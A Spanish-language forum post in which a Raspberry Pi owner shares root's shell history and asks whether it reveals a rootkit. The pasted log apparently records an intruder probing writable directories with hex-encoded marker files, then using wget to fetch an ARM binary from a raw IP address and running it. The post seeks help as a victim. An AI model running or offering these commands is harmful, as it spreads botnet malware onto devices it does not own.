Utilizo Buildroot (zImage y compilación del kernel) para mis Raspberry Pi, y BusyBox como conjunto de comandos de Linux.
Es la segunda vez que parece que tengo un rootkit: así lo indica el historial de sh de root, que copio a continuación. Mi pregunta es: ¿es un rootkit?
324 /bin/busybox cp; /gweerwe323f
325 mount ;/gweerwe323f
326 echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
327 echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
328 echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon
329 echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
330 echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon
331 echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon
332 echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon
333 echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon
334 echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon
335 echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; cat /run/.nippon; rm -f /run/.nippon
336 echo -e '\x47\x72\x6f\x70/run/lock' > /run/lock/.nippon; cat /run/lock/.nippon; rm -f /run/lock/.nippon
337 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; cat /sys/fs/cgroup/.nippon; rm -f /sys/fs/cgroup/.nippon
338 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; cat /sys/fs/cgroup/systemd/.nippon; rm -f /sys/fs/cgroup/systemd/.nippon
339 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; cat /sys/fs/cgroup/cpuset/.nippon; rm -f /sys/fs/cgroup/cpuset/.nippon
340 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon; cat /sys/fs/cgroup/cpu,cpuacct/.nippon; rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
341 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; cat /sys/fs/cgroup/blkio/.nippon; rm -f /sys/fs/cgroup/blkio/.nippon
342 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; cat /sys/fs/cgroup/devices/.nippon; rm -f /sys/fs/cgroup/devices/.nippon
343 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; cat /sys/fs/cgroup/freezer/.nippon; rm -f /sys/fs/cgroup/freezer/.nippon
344 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; cat /sys/fs/cgroup/net_cls/.nippon; rm -f /sys/fs/cgroup/net_cls/.nippon
345 echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
346 echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; cat /dev/mqueue/.nippon; rm -f /dev/mqueue/.nippon
347 echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon; cat /sys/kernel/debug/.nippon; rm -f /sys/kernel/debug/.nippon
348 echo -e '\x47\x72\x6f\x70/sys/kernel/config' > /sys/kernel/config/.nippon; cat /sys/kernel/config/.nippon; rm -f /sys/kernel/config/.nippon
349 echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
350 echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon; cat /boot/.nippon; rm -f /boot/.nippon
351 echo -e '\x47\x72\x6f\x70/run/user/0' > /run/user/0/.nippon; cat /run/user/0/.nippon; rm -f /run/user/0/.nippon
352 echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
353 /gweerwe323f
354 cat /bin/echo ;/gweerwe323f
355 cat /proc/cpuinfo;/gweerwe323f
356 cd /; wget http://195.22.127.83/bins/usb_bus.arm7 -O - > usb_bus ; chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f
357 ps aux
358 dmesg